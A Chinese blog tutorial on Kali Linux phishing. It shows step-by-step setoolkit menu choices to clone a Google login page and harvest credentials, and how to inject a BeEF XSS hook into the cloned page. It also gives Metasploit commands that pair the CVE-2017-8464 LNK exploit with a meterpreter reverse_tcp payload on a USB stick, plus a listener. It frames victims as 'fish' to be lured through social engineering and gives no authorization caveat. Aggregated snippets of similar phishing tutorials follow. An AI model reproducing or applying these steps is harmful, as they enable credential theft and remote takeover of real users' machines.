[Kali渗透]-钓鱼执法

原创 已于 2023-09-03 00:19:49 修改 · 461 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2023-09-02 23:55:50 首次发布
文章介绍了setookit,一个开源的社会工程学渗透测试框架,如何用于制作钓鱼页面,结合beef-xss进行XSS攻击,以及利用USB进行社工钓鱼,通过msf生成攻击向量并监听。

一、setookit制作钓鱼页面

setookit简介

setookit,即社会工程学工具集Social-Engineer Toolkit,是一个为社会工程设计的开源渗透测试框架。

SET具有很多自定义攻击向量,可让你快速进行可信的攻击

项目地址:https://github.com/trustedsec/social-engineer-toolkit/

kali上自带可以直接使用,终端输入setookit

在这里插入图片描述

制作钓鱼页面

1⃣️选1

在这里插入图片描述

2⃣️选2

在这里插入图片描述

3⃣️选3

在这里插入图片描述

4⃣️选1

在这里插入图片描述

5⃣️==选google模版,等待上线
在这里插入图片描述

二、钓鱼页面与beef-xss结合

1. 启动setookit构造钓鱼页面

依次按照如下顺序:1 ——> 2 ——> 3 ——> 1 ——> [自己kali的IP] ——> 2

2. 启动beef

1⃣️更新源

apt-get update

2⃣️下载及运行

beef-xss

3. 将HOOK代码嵌入钓鱼页面

vim ~/.set/web_clone/index.html

4. 通过社工让鱼儿访问我们的钓鱼页面

如果鱼儿输入账号密码就会将他们发送到我们的kali上

5. 回到kali查看效果

可以看到beef已经收到回连

三、利用USB社工钓鱼

1. 利用msf生成攻击向量

1⃣️打开终端输入

msfconsole

2⃣️继续输入

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

3⃣️

set payload windows/meterpreter/reverse_tcp

4⃣️

options

5⃣️

set lhost [自己kali的IP]

6⃣️

run

在这里插入图片描述

2. 将攻击向量放到USB中,并启动msf监听

1⃣️启动msf监听

use multi/handler

2⃣️

set payload windows/meterpreter/reverse_tcp

3⃣️

set lhost [自己kali的IP]

4⃣️

run

在这里插入图片描述

3. 打开USB,执行文件

在这里插入图片描述

kali制作钓鱼网站
m0_58713554的博客
12-27 7098
设置攻击方Kali Linux主机的网络连接模式为桥接模式,如下图所示。 步骤:选择设置/选择网络适配器/选择桥接模式/选择确定 选择图形化界面打开工具setoolkit(钓鱼网站部署工具),如下图所示。 步骤:选择13-Social Engineering toolkit/选择social engineering toolkit工具/双击打开/初次进入需要输入y 选择命令行界面打开工具setoolkit(钓鱼网站部署工具),如下图所示。 命令:setoolkit ...
社会工程攻击——setoolkit使用(含错误解决)
热门推荐
m0_57069925的博客
06-08 1万+
此文章可学习钓鱼网站生成的技巧,切勿用于真实环境,仅用于学习,若产生一切后果,由产生者负责社会工程攻击,是一种利用“社会工程学” (Social Engineering)来实施的网络攻击行为。比如免费下载的软件中捆绑了流氓软件、免费音乐中包含病毒、钓鱼网站、垃圾电子邮件中包括间谍软件等,都是近来社会工程学的代表应用。Kali Linux系统集成了一款社会工程学工具包 Social Engineering Toolkit (SET),它是一个基于Python的开源的社会工程学渗透测试工具。这套工具包由Davi
社工利器--setoolkit之钓鱼攻击
Aisen_bear的博客
08-04 2783
该文章仅供参考学习,切勿用于非法用途 简介 社会工程学(Social Engineering)认为人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的
kali制作一个简单的钓鱼网站
hovcfuti的博客
07-20 5261
钓鱼网站上输入的用户名和密码会直接显示到kali中,成功得到受害者的账号,这里我没有账号随便输入一个,如果输入的账号是正确的话会直接转跳到真正的网站中,直接无色无味。这时候直接访问自己kali虚拟机的IP,就会访问到一个假的网站,有些小瑕疵哈哈哈,不重要,主要是学习。这时候就可以选择攻击类型,这里我们想要制作一个简单的钓鱼网站,输入1,选择社会工程攻击,回车。输入2,选择网站攻击,回车(英语不好,都靠翻译软件,有些不准确)这时候在生成的钓鱼网站中登录,kali机会监听到一些有趣的东西。
kali下利用weeman进行网页钓鱼
weixin_30236595的博客
09-10 857
工具下载链接:https://files.cnblogs.com/files/wh4am1/weeman-master.zip 利用wget命令下载zip压缩包 利用unzip命令解压 接着直接cd进目录运行weeman.py show #查看配置信息 url #需要复制的钓鱼页面 port #端口 action_url #钓鱼后跳转...
用于黑客渗透测试的 21 个最佳 Kali Linux 工具
wuli1024的博客
12-30 2306
实际上 Kali Linux 捆绑了很多工具。
闲谈:渗透测试-红队版
weixin_43896582的博客
04-27 9043
闲谈:渗透测试-红队版第二篇Blind XSS漏洞反序列化攻击JavaScript 和远程代码执行服务器端请求伪造(SSRF)XML 外部实体攻击(XXE) 第二篇 短短的一生我们总会失去。你不妨大胆一些,攀一座山,追一个梦。 Blind XSS漏洞 见字知意,正如攻击的名称所表示的那样,攻击者/用户看不到存储的 XSS payload 的执行(无回显),只有管理员或后台员工才能看到。易被遗忘,可...
kali Linux 社会工程学工具
qq_39308796的博客
06-15 1066
kali Linux 社会工程学工具使用
3、网络安全红蓝紫团队与数字取证基础解析
最新发布
linux6sysadmin的博客
08-23 47
本文深入探讨了网络安全中红队、蓝队和紫队的角色及其重要性,并详细解析了数字取证的基础知识、方法和工具。文章还比较了常见的数字取证操作系统和商业与开源工具的优劣,为组织和个人在提升网络安全防护能力方面提供了全面的指导和建议。
渗透测试学习笔记20.11.20
qq_44096493的博客
02-18 4429
Kali linux Kali linux是基于Debian的Linux发行版,预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper等。 Metasploitable2 (Linux) https://www.freebuf.com/articles/system/34571.html cdn如何放置DDOS攻击 Kali抓包破解WIFI ...
使用Kali搭建钓鱼网站教程
weixin_63116337的博客
03-07 2093
使用kali工具一分钟制作出和目标网站一模一样的钓鱼网站。目标用户使用钓鱼网站登录自己的账号,账号密码将被自动劫持。
制作钓鱼网站骗取登录密码
菜菜的博客
06-10 792
钓鱼软件伪造真实界面,骗取用户密码,KALI,社会工程学,欢迎大家批评指正!
XSS漏洞利用/setookit制作克隆网站/看完必会
ChenD的学习笔记
10-11 1045
kali setookie克隆网页,XSS漏洞跳转到克隆网页,获取用户名与密码
kali系统
渗透、攻防、CTF、编程
06-23 1718
Windows 10 Pentest Toolkit Suite 使用 windows 10 Professional 1909 x64 MSDN 原版镜像制作 使用 VMWare 15.0 制作,镜像容量 38GB 集成自 2020年4月26日全部补丁(开启更新,建议保留) 系统环境类 DirectX Java 1.8 Python 2.7 Python 3.7 Ruby 2.6.5 .Net Framework 3.5 Visual Basic Virtual Machine Microso
克隆网站工具_利用开源工具搭建钓鱼网站对公司员工进行安全意识测试
weixin_39860919的博客
12-16 341
给大家介绍的开源工具叫Social-Engineer Toolkit,简称SETookit,地址是https://github.com/trustedsec/social-engineer-toolkit有5千的star。SEToolkit是专门用于社会工程的高级攻击包,首先大家要了解下啥叫社会工程学。社会工程学(Social Engineering)在上世纪60年代左右作为正式的学科出现,广义社...
渗透测试--钓鱼网站实验
qq_65150735的博客
08-03 2205
钓鱼网站实验
使用setoolkit 进行钓鱼攻击
Azure_atk的博客
05-29 8688
该实验仅用于学习,请不要实现违法目的 该攻击在kali虚拟机和阿里云的Ubuntu 16.04下进行 在Ubuntu 16.04下安装setoolkit 由于setoolkit无法用apt安装,所以需要下载源码 该项目的github地址:https://github.com/trustedsec/social-engineer-toolkit 该软件的安装说明: 下载后切换到软件目录,pip安装...
kali SET工具(钓鱼网站、钓鱼二维码制作)
2401_83000550的博客
12-07 1033
这次我们生成一个网址为百度的二维码,下方是生成图片的位置。这里选择你的攻击机IP,就是kali的IP。首先介绍钓鱼网站攻击。
利用kali简单制作一个钓鱼网站(简单方法,记录学习过程)
2401_87385842的博客
09-20 1364
选择要克隆的网站,这里我们可以看到百度的网址为http://www.baidu.com,输入这个网址。第一步上升管理者权限(这一步不会和显示密码错误可以看我的第一篇文章)如果是第一次setoolkits会出现这个,这时输入y。然后会跳出ip地址(----),点enter键。在这里输入刚刚的IP地址,一个简单钓鱼网站就做好了。第三步即可使用setoolkit了,输入1。第二步,输入setoolkits。
Get:1 http://mirrors.ustc.edu.cn/kali kali-rolling InRelease [41.5 kB] Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/contrib Sources [81.5 kB] Get:3 http://mirrors.ustc.edu.cn/kali kali-rolling/main Sources [17.3 MB] Get:4 http://mirrors.ustc.edu.cn/kali kali-rolling/non-free Sources [122 kB] Get:5 http://mirrors.ustc.edu.cn/kali kali-rolling/non-free-firmware Sources [8138 B] Get:6 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 Packages [21.0 MB] Get:7 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 Contents (deb) [51.4 MB] Get:8 http://mirrors.ustc.edu.cn/kali kali-rolling/non-free amd64 Packages [197 kB] Get:9 http://mirrors.ustc.edu.cn/kali kali-rolling/non-free amd64 Contents (deb) [911 kB] Get:10 http://mirrors.ustc.edu.cn/kali kali-rolling/non-free-firmware amd64 Packages [10.6 kB] Get:11 http://mirrors.ustc.edu.cn/kali kali-rolling/non-free-firmware amd64 Contents (deb) [26.4 kB] Get:12 http://mirrors.ustc.edu.cn/kali kali-rolling/contrib amd64 Packages [120 kB] Get:13 http://mirrors.ustc.edu.cn/kali kali-rolling/contrib amd64 Contents (deb) [327 kB] Fetched 91.6 MB in 26s (3586 kB/s) Reading package lists... Done W: http://mirrors.ustc.edu.cn/kali/dists/kali-rolling/InRelease: Key is stored in legacy trusted.gpg keyring (/etc/apt/trusted.gpg), see the DEPRECATION section in apt-key(8) for details.
07-03
在使用 Kali Linux 的 `apt update` 命令时,若出现类似以下警告: ``` W: https://mirrors.aliyun.com/kali/dists/kali-rolling/InRelease: Key is stored in legacy trusted.gpg keyring (/etc/apt/trusted.gpg),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你怎么知道我头发乌黑浓密

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值